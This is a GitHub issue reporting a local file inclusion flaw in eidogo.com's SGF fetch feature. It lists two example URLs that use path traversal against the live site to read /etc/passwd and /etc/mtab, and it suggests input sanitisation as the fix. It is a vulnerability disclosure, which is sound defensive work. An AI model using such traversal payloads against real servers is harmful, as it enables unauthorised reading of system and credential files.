eidogo icon indicating copy to clipboard operation
eidogo copied to clipboard
verified publisher icon jkk

LFI Vulnerability

Open eitanshav opened this issue 3 years ago • 0 comments

eidogo.com is vulnerable to LFI in the SGF file upload in "Fetch SGF from a URL". A malicious actor can exploit this vulnerability to retrieve sensitive files that stored in the server

Here are examples exploiting this vulnerability:

  1. http://eidogo.com/backend/fetch.php?url=../../../../../etc/mtab
  2. http://eidogo.com/backend/fetch.php?url=../../../../../etc/passwd
  • Vulnerable code:

https://github.com/jkk/eidogo/blob/master/backend/upload.php#L32-#L37

  • Mitigation:

User controlled input must be sanitized.

eitanshav avatar Jul 10 '22 08:07 eitanshav